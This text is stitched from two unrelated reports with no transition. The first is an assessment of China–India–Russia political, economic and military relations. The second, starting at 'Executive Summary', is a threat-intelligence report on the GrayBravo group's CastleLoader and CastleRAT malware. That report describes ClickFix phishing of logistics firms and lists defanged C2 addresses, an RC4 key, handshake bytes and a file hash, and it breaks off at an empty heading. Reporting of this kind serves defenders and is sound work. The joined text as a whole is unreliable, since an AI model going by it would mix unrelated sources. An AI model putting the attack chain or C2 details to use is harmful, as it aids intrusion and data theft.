Over the last year, China and India’s relations have thawed significantly, especially compared to 2020, when the China-India border dispute escalated. In 2024, China and India concluded an agreement that returned the border to its pre-2020 status, thereby completing a disengagement process and reopening border trade. India and China began re-engaging in diplomatic dialogue at the highest level, including a meeting between Modi and Xi on the sidelines of the BRICS summit in Kazan, Russia, in October 2024. In September 2025, Modi visited China for the first time in seven years to attend the 2025 SCO Summit, during which China and India resumed direct commercial flights after a five-year freeze. Chinese Foreign Minister Wang Yi and Indian External Affairs Minister Subrahmanyam Jaishankar emphasized the importance of continued cooperation between the two countries.

Despite China and India’s recent diplomatic and economic overtures, tensions remain, particularly around India’s likely suspicions of China’s regional assertiveness and its likely hesitancy to join a persistent anti-Western bloc. Both countries have endorsed the idea of a multipolar world, but Modi has emphasized the need for a multipolar Asia, likely highlighting continuing tensions that stem from China’s economic influence, military power, and international assertiveness. India likely seeks to balance asserting itself as a regional power while maintaining good relations with the US. As such, India has not mirrored Russia and China’s strong advocacy for de-dollarization and replacing the international financial system with one based on China’s currency; it has only supported inter-BRICS trade based on local currency.

Economic Dynamics

We assess that China-India economic relations are generally positive, though India took steps to limit Chinese investment during the COVID-19 pandemic and during the 2020 border clashes. In April 2020, India issued Press Note 3, which limited Chinese investment and existing investments; new Chinese foreign direct investment cumulatively fell by approximately 80% in the 2021–2024 period compared to prior to 2021, and the number of active Chinese companies in India declined by nearly 500. For example, India reportedly rejected a proposed $1 billion investment by China’s electric car maker BYD in 2023 over national security concerns, and a visa ban on Chinese tourists reportedly constrained BYD’s lobbying efforts.

Despite Indian actions to limit Chinese investment, India’s economy likely remains heavily dependent on Chinese supply chains, which very likely gives Beijing some economic leverage over India.

India faces a significant and growing trade deficit with China — reaching $99.21 billion between 2024 and 2025 — and this imbalance has more than doubled in four years. China remains India’s top import source for many goods and commodities critical to its own industrial output, including electronics, telecommunications, electrical products, and machinery.

India has taken actions to reduce its dependence on Chinese investment and develop its own competitive advantage. Modi’s administration has bolstered investment in domestic production and implemented protectionist policies, such as the “Make in India” policy, the Production-Linked Incentive (PLI) scheme, and, most recently, the “National Manufacturing Mission.” Threatening China’s economic and technological interests, India banned hundreds of Chinese-developed mobile applications and has pursued efforts with the US to develop advanced technology supply chains. China has pushed back against some of these efforts. For example, China may have sought to impede Apple from moving its supply chain for US phones from China to India.

Another area of tension in the China-India economic relationship is very likely China’s increasing investment in South Asia, which conflicts with India’s “Neighbourhood First” policy, in which India views the region as its primary sphere of influence. The policy, considered a “defining subset of its overall foreign policy,” hinges on India fostering connectivity, trade, and stability across the region. India likely perceives China’s engagement in South Asia as an effort to exert dominance in a region vital to India’s strategic interests. India almost certainly opposes China’s Belt and Road Initiative (BRI) because New Delhi views China’s strategy –– an expansive development and investment project originally devised to construct infrastructure linking East Asia and Europe –– as seeking to dominate the region and counter India’s regional influence, posing a direct threat to Indian sovereignty. A specific point of contention is the China-Pakistan Economic Corridor (CPEC) — a 3,000-kilometer, over $60 billion project linking China and Pakistan through roads, railways, and pipelines — which India almost certainly perceived as the most immediate threat to Indian sovereignty, as it runs through disputed territory in Pakistan-occupied Kashmir. The CPEC aims to facilitate Chinese energy imports while strengthening Pakistan’s economy and strategic connectivity, and Beijing’s backing of Islamabad with resources and infrastructure is likely a major concern for India.

Despite tensions, the value of China’s annual exports to India was greater between 2020 and 2024 than between 2016 and 2020, and was approximately $20 billion more in 2021 than in 2018. The total value of foreign direct investment from China into India also returned to an upward trajectory after 2021, and particularly in 2024. Multilateral fora such as BRICS and the Asian Infrastructure Investment Bank (AIIB) likely provide additional mechanisms for economic cooperation. China launched the AIIB in 2016, and the bank has dozens of approved projects in India.

Military Dynamics

We assess that, since 2020, the China-India military dynamic has centered primarily around a longstanding border dispute and each state’s suspicions of the other’s regional ambitions.

India and China share a contested 3,440-kilometer (2,100-mile) border in the Himalayas over which the two countries have had an ongoing, historic dispute. The two states compete to build infrastructure along the border, known as the Line of Actual Control. The border rivalry devolved into open confrontation in the Galwan Valley in June 2020, resulting in the deaths of twenty Indian and four Chinese soldiers. Four years of tension followed, during which each side built up troops in the contested areas. After at least 21 rounds of Senior Highest Military Commander Level (Corps Commander) talks and other efforts, India and China signed an agreement in 2024, which led to the disengagement of troops. Even with border tensions currently defused, the overarching territorial dispute very likely persists as a potential strategic flashpoint in the future. As such, military cooperation is unlikely; after the 2025 SCO summit, Modi did not attend the military parade organized in Beijing to commemorate the 80th anniversary of the end of World War II.

In addition, China’s efforts to assert military power via naval exercises in the Indian Ocean Region (IOR) are likely a particular point of contention between China and India. China’s People’s Liberation Army (PLA) is increasingly active throughout the IOR, often as part of air, land, and sea-based multilateral exercises but also to support the PLA Navy’s “Far Seas Protection” strategy. In addition to military exercises, the PLA makes use of commercial ports in the IOR, some of which are owned or operated by Chinese state-owned enterprises. New Delhi very likely perceives China’s regional cultivation of dual-use commercial ports, naval base in Djibouti, and likely naval facility access in Cambodia — sometimes referred to as a “string of pearls” strategy by analysts outside of China — as an encirclement of India in what New Delhi considers its regional maritime domain. This competition has played out at ports across the region. For example, in 2022, China and India competed to influence Sri Lanka’s decision regarding China’s request to dock a military vessel at the China-owned and operated Port of Hambantota; the ship ultimately called at the port over New Delhi’s objections. In 2023, India objected to the presence of a Chinese state-owned research vessel, which China very likely uses to support PLA requirements. In support of their territorial claims and very likely to facilitate military contingencies, China and India have worked to build out relevant infrastructure along disputed border areas.

Finally, China likely views New Delhi’s joint military exercises with third parties as evidence that India is preparing for a China contingency. In 2022, an annual exercise with the US took place just 62 miles from a disputed border area. In 2024, India organized the first Tarang Shak air combat exercise that involved ten countries, including the US. In 2025, India and the Philippines conducted a joint naval drill in the South China Sea. India almost certainly views China’s military cooperation and integration with Pakistan –– including China’s role as Islamabad’s main supply of arms –– as a grave threat to Indian security. China is responsible for 81% of Pakistan’s arms imports.

India-Russia Relationship: Longstanding and Rooted in Arms Sales and Trade

India and Russia have had a close partnership since at least the 1950s, very likely anchored by a mutual desire to push back against perceived US hegemony, Russian arms sales to India, and, more recently, an increase in Indian purchases of Russian oil. In 2010 and 2024, India and Russia defined their relationship as a “Special and Privileged Partnership.” Following a July 2024 summit, Modi and Putin issued a statement calling the India-Russia partnership a “time-tested relationship which is based on trust, mutual understanding and strategic convergence.”

Political Dynamics

India and Russia’s political partnership very likely dates back to at least the 1950s, when the Soviet Union used its UN veto to support India’s claims on Kashmir, and is anchored by a shared strategic interest in re-balancing post-Cold War US hegemony in favor of a multipolar world order. New Delhi has called Moscow “key to India’s quest for a stable Asian balance of power.” However, India and Russia’s visions for what a multipolar world looks like very likely differ. India’s principle of multi-alignment aims to reform global power dynamics and is not anti-West, in contrast to Russia’s goal of ushering in a world in which Russia, China, and the US are on equal footing. Indian Foreign Minister Subrahmanyam Jaishankar has articulated that India’s “non-West” character does not mean it is “anti-West.” Jaishankar’s book on India’s foreign policy, Why Bharat Matters, asserts that India’s approach that distanced itself from the West “has led [India] to develop dependencies elsewhere” — yet specifically asserts that India “must realize that there is little profit in being anti-West.”

India’s diplomatic approach to Russia suggests it is willing to occasionally compromise on its declared neutral, non-aligned strategy. India abstained on multiple UN resolutions relating to Russia’s invasion and Ukraine’s sovereignty, has not taken a condemnatory stance against Russia’s invasion of Ukraine, and consistently calls for a “peaceful resolution through dialogue and diplomacy.” Modi and Putin have publicly maintained a warm friendship despite US and European criticism of Russia, and Modi has referred to Russia as India’s “all-weather friend and trusted ally.”

Economic Dynamics

Russia very likely views India as a critical, longstanding market for Russian weapons and, increasingly since Russia’s full-scale invasion of Ukraine in 2022, an economic partner that helps Russia recoup revenue lost due to Western sanctions. India’s import of crude oil from Russia increased from $2.3 billion in 2021 to $52.7 billion in 2024, despite Western sanctions on Russia. India’s Ministry of External Affairs has stated that India “does not subscribe to any unilateral sanctions measures,” and “considers the provision of energy security a responsibility of paramount importance to meet the basic needs of its citizens.” Since 2023, Russia has been India’s top supplier of crude oil, and Russian oil exceeded 40% of India’s overall crude imports by May 2025. As a result, India is now the second-largest purchaser of Russian crude oil after China. Discounted Russian oil has fueled India’s surging energy needs and enabled it to become the third-largest exporter of refined petroleum products, which is India’s most exported product. Even after US President Donald Trump placed a 50% tariff to dissuade India from continuing to buy Russian oil, Indian oil imports remained steady in the first half of September 2025. The US subsequently imposed sanctions on Russian oil exporters Lukoil and Rosneft on October 22, 2025, prompting Indian refiners to pause new orders and seek alternatives for sanctioned Russian oil. On October 28, an India-bound tanker carrying Russian crude turned around in the Baltic Sea — an incident that oil analysts attributed to the US sanctions pressure. However, Indian Oil continued to purchase Russian crude from non-sanctioned entities, suggesting the US sanctions are likely to impact, but not halt, India’s imports from Russia.

Total trade between India and Russia amounted to $68.7 billion in FY2025, likely surging as a result of the vacuum left by Western firms. However, India’s imports from Russia account for $63.8 billion, over 90% of the total trade, reflecting a significant trade imbalance. Even so, New Delhi aims to achieve $100 billion in trade with Russia by 2030. Both countries seek to reduce reliance on the US dollar, and 90% of trade is now settled in ruble-rupee transactions. However, India’s trade with the West will likely complicate financial integration; India has been hesitant to adopt sanctions-resistant payment networks with Russia and has dismissed the idea of replacing the US dollar.

Military Dynamics

We assess that India and Russia’s military relationship is centered on Russia’s long history of exporting weapons to India, which has created an Indian dependence on Russian systems. Over the past twenty years, India has purchased roughly $60 billion in Russian weapons, amounting to 65% of its total weapons imports. India’s purchases include Russia’s S-400 missile defense system, which India used in May 2025 to repel Pakistani missile attacks. India and Russia have also pursued joint production of weapons, including T-90 tanks and Su-30MKI aircraft. India-Russia military cooperation has stagnated on other fronts, such as joint training and exercises.

Although Moscow continues to be India’s main arms supplier, India’s arms purchases from Russia have declined since 2024, as India has sought to reduce its reliance on Russia and increasingly purchase from Western suppliers, including France, Israel, and the US. On October 31, 2025, India and the US signed a ten-year Defense Framework Agreement, which Indian Defense Minister Rajnath Singh described as the start of a “new chapter” in India-US defense cooperation and “a signal of our growing strategic convergence.” This agreement likely reflects India’s intent to continue diversifying its military cooperation and arms trade beyond Russia, and shore up its US partnership amid tariff-related strife — further reinforcing the multi-alignment doctrine driving India’s security calculations and reducing the likelihood of a Russia-India-China military alliance.

The documented poor performance of Russian weapons systems in Ukraine likely impacts India’s calculus. A leak by hacker collective “Black Mirror” revealed internal documents from Russia’s state-owned defense conglomerate Rostec detailing how the Russian-manufactured radar system installed in India’s MiG-29K fighter aircraft suffered extensive and systemic failures between 2016 and 2019; this lack of reliability likely encouraged India’s move away from Russian weapons.

State of the Nascent Trilateral Dynamic and Indicators of Deepening Trilateral Cooperation

China, India, and Russia have not declared a formal bloc; instead, in recent months, the three states have taken primarily diplomatic steps to project increased interest in trilateral engagement –– most notably a meeting between Modi, Putin, and Xi at the 2025 SCO Summit. Though the three states did not make any concrete commitments at the summit, the meeting represents the first time all three leaders have met in person since 2019, and very likely reflects an effort by Russia and China to exploit strains in the US-India relationship to draw India away from the US.

Past trilateral engagement, which has primarily occurred at multilateral fora such as BRICS, SCO, and G20 Summits, has not resulted in a solidified, institutionalized trilateral bloc due to divergent national interests that will likely pose a long-term structural impediment. These strategic differences will likely persist and continue to limit the depth and breadth of alignment among the three countries, making it less likely that a solidified trilateral bloc will emerge in the short term. The three primary multilateral fora where trilateral engagement –– short of formation of a bloc –– has occurred are the now-dormant RIC format, BRICS, and the SCO.

RIC Format: Dormant, Though Russia and China Are Interested in Reviving It

The RIC format is likely the multilateral forum in which trilateral engagement would primarily take place, given the apparent interest of Beijing and Moscow in reviving the dormant discussion format and New Delhi’s apparent reserved openness to the possibility. The RIC format, which began formally in 2007 and involves trilateral discussions among the foreign ministers of these countries, has been inactive since late 2021.

Between 2002 and 2020, twenty trilateral ministerial-level meetings occurred, covering topics such as trade, energy, and disaster management. At the most recent RIC foreign ministers meeting in November 2021, the three countries expressed interest in regular high-level meetings, reiterated the importance of international reform for a multipolar and rebalanced world, and opposed unilateral sanctions imposed outside of the UNSC.

In a 2022 joint statement, China and Russia declared their intent to develop cooperation within the RIC format, a sentiment Russian Foreign Minister Sergey Lavrov reiterated in May 2025. In July 2025, an Indian government spokesperson neither rejected nor explicitly supported the revival of the RIC format, likely indicating India’s reserved openness to it.

BRICS: Ill-Equipped to Institutionalize Trilateral Engagement, Though Opportunities Remain for Economic Engagement

The BRICS (Brazil, Russia, India, China, and South Africa) bloc is active, though very likely ill-equipped to facilitate the institutionalization of a trilateral Russia-India-China bloc due to its status as an informal coordinating body, as opposed to an organization that requires mutual commitments. BRICS was formed in 2009 and is an organization committed to perpetuating a multipolar world via political, security, and economic cooperation.

Though Russia and China have sought to make BRICS a geostrategic bloc to rival the West, the organization does not bind its member states to any treaty, alliance, or formal legal structure, thereby limiting the organization’s ability to institutionalize a geostrategic bloc. India views the forum as a key balancing factor in its nuanced multi-alignment strategy, in which New Delhi seeks to position itself as a bridge between Western and non-Western fora.

Despite the overall limitations of the BRICS structure, the connectivity it provides for financial institutions likely raises the possibility of BRICS facilitating trilateral economic integration, should China, India, and Russia choose to pursue that sort of cooperation. BRICS has established two financial institutions, both of which are based on foundational treaties. The New Development Bank (NDB) supports collaborative development projects in emerging markets and developing countries, and the Contingent Reserve Arrangement ensures BRICS’s central banks provide mutual support during a currency crisis. BRICS’s interconnected financial systems could facilitate trilateral economic activity and offer a way for the three countries to conduct trade payments.

We assess that BRICS could also facilitate Russia and China’s efforts to develop alternatives to the US dollar, though India’s hesitation to aggressively push for de-dollarization likely limits the extent to which de-dollarization will become an area for trilateral engagement. BRICS nations have explored the development of a common currency and have specifically created a cross-border digital payment and messaging system backed by cryptocurrency, called BRICS Pay. During the July 2025 BRICS summit in Rio de Janeiro, Brazil, member countries reportedly made progress in “identifying possible pathways to support the continuation of discussions on the potential for greater interoperability of BRICS payment systems.”

Shanghai Cooperation Organization (SCO): Encumbered by Competing Interests

Despite the fact that Russia, India, and China’s latest trilateral engagement took place at the SCO Summit in 2025, the SCO is unlikely to facilitate a deeper trilateral relationship, as it is encumbered by competing interests. The SCO was founded in 2001 to focus on border security and ethnic minority separatism in China’s Xinjiang region, though it has since expanded to encompass counter-drug trafficking efforts, coordination in support of economic development, wider security-relevant matters, and other activities. India joined in 2017, after being an observer since 2005, with Russia’s support and possibly without China’s, as Beijing sponsored Pakistan’s membership that same year.

China and Russia have used the SCO to advance their geopolitical aims, including shaping future multipolarism and projecting power. In particular, China uses the SCO as a foundation for expanding an international security architecture that is consistent with the CCP’s regime security.

We assess that the SCO’s institutional capacity to take unified action is limited, in part by the fact that its members are not consistently aligned. For example, India initially did not participate in crafting a SCO statement criticizing Israeli and US strikes against Iran in June 2025, although it later joined a different SCO statement condemning the same activities. The SCO did not stop China-India border clashes in 2020, although it helped facilitate bilateral discussions. Following the 2025 clashes between India and Pakistan, India reportedly objected to an SCO statement it viewed as undermining its own position. According to one Chinese think tank director, India is using the SCO to contain China’s influence and push back on its development and security initiatives, such as the BRI.

Indicators of Deeper Trilateral Cooperation

The table below highlights potential indicators of increasing trilateral cooperation in the future, as well as the factors most likely limiting trilateral cooperation today and going forward. China-India tension is very likely the primary constraint to the development of a trilateral bloc.

Note: The analysis cut-off date for this report was November 10, 2025

Executive Summary

Insikt Group continues to monitor GrayBravo (formerly tracked as TAG-150), a technically sophisticated and rapidly evolving threat actor first identified in September 2025. GrayBravo demonstrates strong adaptability, responsiveness to public exposure, and operates a large-scale, multi-layered infrastructure. Recent analysis of GrayBravo’s ecosystem uncovered four distinct activity clusters leveraging the group’s CastleLoader malware, each defined by unique tactics, techniques, and victim profiles. These findings reinforce the assessment that GrayBravo operates a malware-as-a-service (MaaS) model.

For example, one cluster, tracked as TAG-160, impersonates global logistics firms, using phishing lures and the ClickFix technique to distribute CastleLoader while spoofing legitimate emails and exploiting freight-matching platforms to target victims. Another cluster, tracked as TAG-161, impersonates Booking.com, also employing ClickFix to deliver CastleLoader and Matanbuchus and novel phishing email management tools. Further investigation through historical panel analysis linked the online persona “Sparja”, a user active on Exploit Forums, to potential GrayBravo-associated activities, based on the alias’s distinctiveness and related discussion topics.

To protect against GrayBravo, security defenders should block IP addresses and domains tied to associated loaders, infostealers, and remote access trojans (RATs), flag and potentially block connections to unusual legitimate internet services (LISs) such as Pastebin, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the Mitigations section for implementation guidance and Appendix H for a complete list of indicators of compromise (IoCs).

Key Findings

• Insikt Group uncovered four distinct activity clusters leveraging GrayBravo’s CastleLoader, each exhibiting unique tactics, techniques, and procedures (TTPs) and victim profiles, reinforcing the assessment that GrayBravo operates a malware-as-a-service (MaaS) ecosystem, as previously hypothesized.
• One cluster, tracked as TAG-160, impersonates logistics firms and deploys phishing lures combined with the ClickFix technique to distribute CastleLoader, while spoofing legitimate emails and abusing freight-matching platforms to engage targets.
• Cluster 2, tracked as TAG-161, impersonates Booking.com and uses ClickFix techniques to deliver CastleLoader and Matanbuchus, relying on threat actor-controlled infrastructure and employing previously unseen phishing email management tooling.

Background

In September 2025, Insikt Group reported on a newly identified threat actor, TAG-150, assessed to have been active since at least March 2025. Since our previous reporting, we have decided to classify TAG-150 as GrayBravo. It is believed to be responsible for developing multiple custom malware families, beginning with CastleLoader and CastleBot, and most recently, CastleRAT. It is characterized by rapid development cycles, technical sophistication, responsiveness to public reporting, and an expansive, evolving infrastructure. Alongside the discovery of the previously undocumented remote access trojan CastleRAT, Insikt Group identified GrayBravo’s multi-tiered infrastructure and its use of various supporting services, including file-sharing platforms and anti-detection tools.

Although public reporting has suggested that GrayBravo operates under a malware-as-a-service (MaaS) model, supported by its delivery of diverse second-stage payloads, the proliferation of CastleLoader administration panels, and features typical of MaaS platforms, Insikt Group has not identified any advertisements or discussions of this service on underground forums. Recorded Future® Network Intelligence indicates that GrayBravo predominantly interacts with its own infrastructure, with only a limited number of external IP addresses, possibly representing customers or affiliates, observed communicating with it. Many of these connections are routed through Tor nodes, complicating attribution and classification.

Through continued monitoring, Insikt Group has identified multiple clusters of activity linked to GrayBravo, reinforcing the assessment that the threat actor is operating a MaaS ecosystem (see Figure 1). This report details the tactics, techniques, and procedures (TTPs) associated with these clusters, believed to represent potential GrayBravo customers or affiliates. More specifically, Insikt Group identified four clusters linked to GrayBravo’s CastleLoader activity: one targeting the logistics sector (TAG-160), another using Booking.com-themed lures across a wider range of victims (TAG-161), a third also impersonating Booking.com but independent from the previous group, and a fourth distributing CastleLoader through malvertising and fake software updates.

Figure 1: Overview of GrayBravo and associated clusters (Source: Recorded Future)

Threat Analysis

Higher Tier Infrastructure

Insikt Group previously identified an extensive, multi-tiered infrastructure tied to GrayBravo. The infrastructure consists of Tier 1 victim-facing C2 servers associated with malware families such as CastleLoader, SecTopRAT, WarmCookie, and the newly discovered CastleRAT, as well as Tier 2, Tier 3, and Tier 4 servers, the latter of which are likely used for backup purposes. Figure 2 provides an overview of the infrastructure used by GrayBravo.

Figure 2: Multi-tiered infrastructure linked to GrayBravo (Source: Recorded Future)

CastleRAT

CastleRAT is a remote access trojan (RAT) observed in both C and Python variants that share several core characteristics. Each variant communicates through a custom binary protocol secured with RC4 encryption and hard-coded sixteen-byte keys. Upon execution, CastleRAT queries a geolocation application programming interface (API) using ip-api[.]com to obtain victim geographic location and network details. Both variants support remote command execution, file download and execution, and establish an interactive remote shell. The C variant exhibits additional capabilities, including browser credential theft, keylogging, and screen capture functionality.

Infrastructure Analysis

Analysis of CastleRAT C-variant command-and-control (C2) infrastructure reveals notable operational overlap across multiple nodes sharing the RC4 key “NanuchkaUpyachka.” As illustrated in Figure 3, Insikt Group observed two CastleRAT C2 servers, 104[.]225[.]129[.]171 and 144[.]208[.]126[.]50, maintain concurrent communications with at least three US-based victims, suggesting coordinated or redundant control channels. The overlapping traffic patterns, observed within the same daily collection windows, indicate that compromised hosts reached out to multiple C2s nearly simultaneously rather than migrating between them over time. This behavior implies a deliberate redundancy strategy employed by the threat actor. Additionally, direct communications between two CastleRAT C variants, 104[.]225[.]129[.]171 and 195[.]85[.]115[.]44, further point to an interconnected infrastructure ecosystem rather than isolated C2 instances. Such internal connectivity could facilitate automated data synchronization, lateral control distribution, or key exchange mechanisms within the threat actor’s tooling, underscoring a more mature coordinated operational model than previously documented.

Figure 3: Victim communication with multiple CastleRAT C2 servers simultaneously (Source: Recorded Future)

Notably, some CastleRAT samples exhibit behavior distinct from other observed variants by incorporating an elaborate handshake sequence and redundancy in their C2 communications. In these cases, the client’s initial request to the C2 server (for example, 77[.]238[.]241[.]203:443) ends with the bytes 07 00 00 00 instead of the usual 01 00 00 00, and the server responds with trailing bytes 9e ff 74 70 before closing the connection. A similar exchange occurs with 5[.]35[.]44[.]176, after which the client reconnects to the first C2, transmitting only an encrypted sixteen-byte RC4 key and receiving trailing bytes 01 00 00 00 in response. The client then repeats this process with the second C2, sending 01 00 00 00 and receiving only the encrypted sixteen-byte RC4 key in return. This pattern suggests the use of additional handshake stages and dual-C2 redundancy mechanisms not seen in all CastleRAT samples.

Clustering by RC4 Key

Analysis of CastleRAT infrastructure identified multiple clusters of IP addresses grouped by hard-coded RC4 encryption keys (see Figure 4). While each RC4 key forms a distinct cluster, all clusters exhibit some degree of overlap through shared keys, suggesting a deliberate or coordinated relationship rather than a coincidental overlap. This interconnected structure suggests a shared tooling or deployment framework underpinning both CastleRAT and CastleLoader operations. Although this does not conclusively establish single-threat actor control, the degree overlap implies a common developer or operator ecosystem rather than independent, uncoordinated usage of the malware.

Figure 4: RC4 key clusters (Source: Recorded Future)

CastleLoader

Infrastructure Analysis

Insikt Group identified additional C2 infrastructure associated with CastleLoader. The related domains and IP addresses are listed in Appendix A. Notably, several domains share the same WHOIS start of authority (SOA) email address, indicating they were likely registered by the same threat actor.

Notably, the domain oldspicenotsogood[.]shop is linked to several other domains listed in Appendix B, which are likely used for malicious activity, including impersonation of legitimate brands such as DocuSign, Norton, and TradingView. Additionally, at least one of these domains, testdomain123123[.]shop, has been identified as a LummaC2 C2 server.

Activity Clusters

Insikt Group identified four distinct clusters of activity associated with the deployment of CastleLoader (see Figure 4). The first cluster, tracked as TAG-160, appears to be highly targeted toward the logistics sector, employing techniques specifically tailored to this industry. In contrast, the second cluster, tracked as TAG-161, exhibits a broader targeting scope and leverages Booking.com-themed lures. The third cluster likewise impersonates Booking.com but shows no overlap with TAG-161. The fourth cluster relies on malvertising campaigns and fake software update mechanisms.

Based on Insikt Group’s assessment, these clusters are associated with distinct users deploying CastleLoader, as no overlap in infrastructure or tactics was observed between them. At this stage, the exact nature of the relationship between these users and GrayBravo (formerly tracked as TAG-150) remains unclear. Insikt Group further assesses that additional CastleLoader users are likely active, supported by proprietary Recorded Future intelligence and the large number of identified panels, which collectively suggest a broader user base.

Cluster 1: Logistics Sector-Focused Activity Tracked as TAG-160

Cluster 1, tracked as TAG-160, has been active since at least March 2025 and remains operational at the time of analysis. TAG-160 employs infrastructure that impersonates logistics companies and leverages logistics-themed phishing lures, among other tactics. It uses ClickFix techniques to deliver CastleLoader, among additional payloads. Evidence suggests the cluster operates a mix of threat actor-controlled and -compromised infrastructure. Additionally, it has been observed exploiting vulnerabilities in target organizations’ systems, such as spoofing legitimate email senders from logistics companies to enhance the credibility of its phishing campaigns. In addition, Cluster 1 uses access to the legitimate freight-matching platforms DAT Freight & Analytics and Loadlink Technologies for multiple purposes.

Attack Flow

Cluster 1 employs spearphishing campaigns in combination with ClickFix techniques to compromise victims. Figure 5 illustrates a high-level overview of the phishing attack flow.

Figure 5: ClickFix attack flow used by TAG-160 (Source: Recorded Future)

The attack chain typically begins with either a spoofed legitimate email address (for example, no-reply[@]englandlogistics[.]com) or a threat actor-controlled address associated with a typosquatted domain (for example, englandloglstics[.]com), impersonating companies such as England Logistics. Historically, such emails have been sent to US-based carriers, presenting fraudulent freight quotes that appear to originate from England Logistics. However, other organizations likely to be influenced by logistics-themed lures cannot be ruled out as potential targets.

The emails prompt recipients to click a link to view a supposed rate confirmation for a shipment, instructing them to copy and paste the link into a browser if it does not open directly. The threat actors often add a sense of urgency, warning that the link will soon expire. Clicking the link leads victims to a landing page designed to harvest information (see Figure 6). Insikt Group has observed multiple variations of these landing pages.

Figure 6: “dpeforms” lure used by TAG-160 (Source: Recorded Future)

Notably, although Insikt Group was unable to retrieve the landing page associated with another Cluster 1–linked domain, loadstracking[.]com, indexed Google search results indicate that the domain likely hosted the same or a similar page as observed in Figure 7. DPE likely stands for “Direct Port Entry,” which is a system designed for exporters, allowing goods to be directly moved from their premises to the port and loaded onto the vessel for export without being transferred to a container freight station.

Figure 7: “dpeforms” page found in Google Search (Source: Recorded Future)

After submitting their information, the victim is presented with ClickFix-style instructions, guiding them through a series of steps purportedly required to complete a document signing process (see Figure 8). By incorporating the DocuSign logo, the threat actors likely aim to enhance the perceived legitimacy of the page and further deceive the victim.

Figure 8: DocuSign-themed ClickFix used by TAG-160 (Source: Recorded Future)

By following the instructions shown in Figure 8, the victim unknowingly executes the command illustrated in Figure 9. This command runs silently in the background, downloads and extracts a payload archive from a remote IP address, executes a Python-based malware using pythonw.exe, and displays a decoy message to appear legitimate. Observed payloads delivered through this method include CastleLoader, HijackLoader, Rhadamanthys, and zgRAT.

Figure 9: ClickFix command (Source: Recorded Future)

Use of Compromised Infrastructure

As part of TAG-160’s phishing infrastructure, the threat actors appear to rely not only on spoofed email addresses, as previously described, but also on compromised systems. Insikt Group has observed indications that the threat actors likely leveraged compromised infrastructure to send phishing emails. For example, at least one domain used to distribute phishing messages contained malware logs from infostealers such as LummaC2, including stolen credentials for a Namecheap account.

Infrastructure Analysis

Insikt Group identified a large number of domains and IP addresses associated with Cluster 1, all of which either impersonate logistics companies or align with logistics-themed phishing lures (see Appendix C). Notably, the majority of these domains include the subdomain apps[.]englandlogistics (for example, apps[.]englandlogistics[.]rateconfirmations[.]com), suggesting they were likely designed to impersonate England Logistics, as outlined in the previous section. One domain, loadstrucking[.]com, instead featured the subdomain app[.]england, following a similar naming pattern.

Insikt Group identified the subdomain files[.]loadstracking[.]com, hosted on the IP address 89[.]185[.]84[.]211 between July 6 and September 26, 2025, which was serving the file newtag.zip (SHA256: d87ccd5a2911e46a1efbc0ef0cfe095f136de98df055eacd1c82de76ae6fecec). The ZIP folder contained a legitimate WinGup executable for Notepad++ that sideloaded a malicious libcurl.dll identified as DonutLoader. This loader subsequently retrieved three intermediate payloads from the legitimate subdomain files-accl[.]zohoexternal[.]com.

Domain Re-Registration Tactic

Similarly, Insikt Group assesses that to further enhance the perceived legitimacy of their infrastructure, the threat actor deliberately re-registered domains previously associated with legitimate logistics companies, in addition to using typosquatted domains. Figure 10 provides two examples of this activity.

Figure 10: Re-registration of logistics-themed domains (Source: Recorded Future)

Notably, the domain cdlfreightlogistics[.]com appears to have previously hosted a website associated with the legitimate company CDL Freight Logistics, Inc. in 2023. Similarly, the domain hometownlogisticsllc[.]com hosted a website for Hometown Logistics LLC in 2021 (see Figure 11).

Figure 11: Registration of domains previously owned by legitimate logistics companies (Source: Recorded Future)

Public Complaints and Suspected Access to DAT and Loadlink

Some of the domains listed in the Infrastructure Analysis section have been publicly referenced in connection with suspicious or fraudulent activity. For example, the email address david[@]cdlfreightlogistics[.]com, associated with the domain cdlfreightlogistics[.]com, first appeared on August 26, 2025, in a public Telegram channel named “current_hot_loads”, a forum used by individuals and companies in the logistics industry to share information such as market rates. In that instance, a user asked other members whether an email was legitimate (see Figure 12). Several respondents indicated they did not believe it to be legitimate.

Figure 12: Example phishing email sent by TAG-160 (Source: Recorded Future)

While Insikt Group was unable to obtain additional details about the email exchange linked to the email posted in the channel, the available text suggests that the threat actor initially contacted potential victims without including malicious content, likely aiming to establish rapport before sending follow-up messages containing malicious links.

In another instance, Insikt Group identified a post from an employee of a legitimate logistics company based in Rhode Island, USA, describing an incident in which a threat actor created accounts impersonating their company on DAT Freight & Analytics (dat.com) and Loadlink Technologies (loadlink.ca), both platforms operating in the freight matching industry (see Figure 13). The fraudulent registrations used fake company information, including the email address paul[@]mrlogsol[.]ca, which is associated with Cluster 1–linked infrastructure. Notably, in line with Cluster 1’s typical patterns, the email addresses used in these operations often consist of only a first name (for example, Paul). The employee reported having contacted both DAT and Loadlink to alert them to the fraudulent activity.

Figure 13: Complaint on Facebook written by an individual targeted by TAG-160 (Source: Recorded Future)

Based on a confirmation email from one of the platforms’ abuse reporting teams, which the employee shared on Facebook as well, it appears that the threat actor was also using a Gmail address impersonating their company, maritza[.]rmlogisticsol[@]gmail[.]com (see Figure 14).

Figure 14: Email shared by an individual targeted by TAG-160 (Source: Recorded Future)

Threat actors associated with Cluster 1 appear to have access to fraudulent DAT and Loadlink accounts, as evidenced by a user report of fraudulent activity on Facebook (see Figure 13) and further supported by additional profiles identified by Insikt Group (see Figure 15). Furthermore, Insikt Group assesses that the threat actors may also have access to compromised legitimate accounts, given the substantial volume of stolen credentials associated with the domains dat[.]com and loadlink[.]ca observed in Recorded Future Identity Intelligence.

Figure 15: Account information linked to TAG-160 (Source: Recorded Future)

Access to platforms like DAT Freight & Analytics and Loadlink Technologies not only enables the threat actors to enhance the appearance of legitimacy, allowing them to maintain plausible profiles should potential victims attempt verification, but also provides opportunities to gather contact information for prospective targets and obtain additional contextual data, such as details on specific loads, dates and times, documents, or related materials, which can then be repurposed as spearphishing lures. In addition, although not verified in this specific case, the threat actors may also post fraudulent load listings containing malicious content, potentially resulting in malware infections.

Possible Overlap with September 2024 Campaign

